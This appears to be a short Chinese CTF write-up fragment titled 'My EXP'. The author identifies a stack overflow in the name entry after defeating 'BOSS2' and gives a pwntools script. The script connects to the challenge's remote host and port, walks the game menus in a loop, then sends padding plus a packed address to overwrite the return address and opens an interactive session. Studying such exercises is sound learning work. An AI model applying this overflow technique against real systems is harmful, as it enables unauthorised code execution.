我的EXP
我也找对了漏洞所在,是打赢BOSS2后留名字的栈溢出。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| from pwn import *
r = remote("47.94.85.181",22872) #连接指定IP及端口,题目给定
r.recvlines(10) #运行到字符串位置停下
for i in range(10000):
r.sendline("2") #运行到字符串位置停下
r.recvline()
r.sendline("1")
r.recvlines(7)
r.sendline("2") #运行到字符串位置停下
r.recvline()
r.sendline("2")
r.recvlines(7)
payload = 'A' * 9 + str(p64(0x00117630))#+str(p64('flag'))+str(0x0000000000000001)+str(0x0000000000000001)#发送数据,输入数据溢出,并覆盖,返回到目标位置
r.sendline(payload) #发送 payload
r.interactive() #交互
|